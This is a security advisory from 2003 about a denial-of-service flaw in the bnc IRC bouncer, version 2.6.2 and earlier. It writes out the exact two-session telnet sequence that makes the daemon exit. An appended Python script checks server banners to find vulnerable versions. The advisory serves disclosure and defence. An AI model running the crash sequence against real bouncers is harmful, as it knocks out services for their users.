bnc version 2.6.2 and below suffers from a denial of service vulnerability. Armed with a valid login and password, a remote user can kill the daemon.
df9ba77e9a022c665d0476f11eddc0d54a32d3a4c2c210cd53987e9a5bed8326
------------------------------------------------------------------------
2003-05-26
BNC <= 2.6.2 DoS
Rosiello Security & DTORS Security
ADVISORY
http://www.rosiello.org
Denial of Service in bnc 2.6.2
February, 2003
I. BACKGROUND
BNC, short for BouNCe, is a daemon that lets people who have no direct access
to the net, but who do have access to another machine that can reach it,
bounce through that machine to IRC. BNC also serves as a host that lets users
bounce through shells to IRC, which provides features such as an interesting
internet address (commonly used for show) and benefits such as mild protection
from common attacks like DoS, by hiding a user's real IP behind that of a
machine better able to withstand such attacks.
II. DESCRIPTION
An authenticated user of the program can remotely kill the daemon, but cannot
execute arbitrary code.
III. ANALYSIS
The following sequence makes the program call exit().
Open two telnet sessions.
FIRST SESSION:
[angelo@rosiello.org]$ telnet 127.0.0.1 32986
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
user first first first first
nick boom ~
NOTICE AUTH :You need to say /quote PASS
PASS temp123
NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy
NOTICE AUTH :Level two, lets connect to something real now
NOTICE AUTH :type /quote conn [server] to connect
NOTICE AUTH :type /quote help for basic list of commands and usage
SECOND SESSION:
[angelo@rosiello.org]$ telnet 127.0.0.1 32986
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
user second second second second
nick boom
NOTICE AUTH :You need to say /quote PASS
PASS temp123
NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy
NOTICE AUTH :Level two, lets connect to something real now
NOTICE AUTH :type /quote conn [server] to connect
NOTICE AUTH :type /quote help for basic list of commands and usage
quit
Connection closed by foreign host.
NOW close the first session too...
quit..
(gdb)Program exited with code 010.
The password must be correct (the user account must exist).
The daemon will die.
IV. DETECTION
bnc 2.6.2 is vulnerable; later versions are not.
The maintainer of the project was notified and confirmed that the bug is
fixed in the latest versions.
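As an added example (not part of the original advisory), the check below helps an administrator decide from a bouncer's own NOTICE AUTH greeting, as shown in section III, whether the running bnc is a version this advisory covers (2.6.2 or older). The banner strings other than the 2.6.2 one are constructed for illustration, not releases named by the advisory.

```python
import re
from typing import Optional, Tuple

# Highest version the advisory reports as vulnerable; later releases are reported fixed.
LAST_VULNERABLE = (2, 6, 2)

# Matches the greeting seen in the advisory:
#   NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy
BANNER_RE = re.compile(r"Welcome to BNC v(\d+(?:\.\d+)*)", re.IGNORECASE)


def parse_bnc_version(banner: str) -> Optional[Tuple[int, ...]]:
    """Return the version tuple advertised in a bnc greeting, or None if the
    line is not a bnc welcome banner (e.g. the 'You need to say /quote PASS'
    notice sent before authentication)."""
    match = BANNER_RE.search(banner)
    if not match:
        return None
    return tuple(int(part) for part in match.group(1).split("."))


def is_vulnerable_banner(banner: str) -> bool:
    """True when the greeting advertises bnc 2.6.2 or older.

    Tuple comparison handles versions of differing length, so a bare "v2.6"
    is treated as older than 2.6.2. Lines that are not bnc banners are
    reported as not vulnerable rather than raising."""
    version = parse_bnc_version(banner)
    if version is None:
        return False
    return version <= LAST_VULNERABLE


def audit_banners(banners) -> dict:
    """Map each captured greeting line to its vulnerability verdict."""
    return {line: is_vulnerable_banner(line) for line in banners}


if __name__ == "__main__":
    # Constructed sample greetings; only the 2.6.2 line is taken from the advisory.
    samples = [
        "NOTICE AUTH :Welcome to BNC v2.6.2, the irc proxy",
        "NOTICE AUTH :Welcome to BNC v2.6.4, the irc proxy",
        "NOTICE AUTH :You need to say /quote PASS",
    ]
    for line, vulnerable in audit_banners(samples).items():
        print(f"{'VULNERABLE' if vulnerable else 'ok        '}  {line}")
```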
V. CREDIT
Angelo Rosiello
http://www.rosiello.org
http://www.dtors.net
Software: